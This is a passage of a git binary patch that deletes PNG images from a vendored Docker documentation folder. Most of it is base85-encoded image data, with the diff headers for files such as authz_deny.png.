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 diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_deny.png b/vendor/github.com/docker/docker/docs/extend/images/authz_deny.png deleted file mode 100644 index fa4a48584abb3db280b8226d18888cb0539de89d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 27099 zcmdSBbySsY*Dnf)5~8$(2q@hlA|NS9OM`Tygn}SQH&QM-Rir~Y1VN-Fln`m8B_*Xh z_Po{i+k1awpYz`y`w4>|{)(SmnBm_`vP$p%`-!N8Fx9lYaf;>N>#OjT;s1Lx zpD;Aij7t}k<^H~tPiU0qzn?H4W4u7EAvq-JEXGqk>Gi z80oWdry&CguGZU=9&|Q?1@>}#Eo4UJn`31bFJBtT>(^}eDrlWvy=|))!rnq0)XyxV z#^yfhxo7oI=l#R`) z?Q5OqQKswG{N}J(#MdY~ndle|sWyh7U|Z2E$(U+M4Nq8->25k+U*8!r>iF^gk--?F zax(is{sU)wh4z*t!Dr@;e&^*vC^rS(87+K!>m>T|*}`QjuL*%nbHTg1a*WjRn8Wo= zWjY>LLPL9)(!XCwHuYiDHb(!WgPf^pdgtp~3ew?JEU$PiaG%WQCb|V(zJ}?Y z%kfh!ynnvoSW?pGgpE&M@-1tQn&kaqg+nZS>R1}DeTg8;v8qzxgV~tF{&#|c2Qh#Feh32>)UpQAunIX$j7lRR*`Y)mte)jbLcG{N6trxoib-BB*ddA zZpyEYR5%GJ+i<eGv#=TI>R^!uR?-PY7+XV6U;q3cY^EtGN4WB4W4;CBQ9h_{XoH=eh ztFLn1%Jx`q#B%suyN5d{-It@x^#YfaD6`&m>*3y%!@;J7>)yEYd7IT=M#et;E$=1` z?yB0w1c`ZGG>Pf$zE3SMExNbhRo3>?6_-FIR)da!hNf6b>g@hoALX|;p#k}hj zsJlh>lG>gItLLgQ#3d$LzVKctZF3x6`SCvg@sBc{jcUim^v~N%104=GEp)4%rp-O% z3Ob=Oq3ww0P^aKEe~Kq&(N1#h8yS}J+;_q_HQ)ZB^_tZWqZ$XBb50+}Ix3ADF=EPR 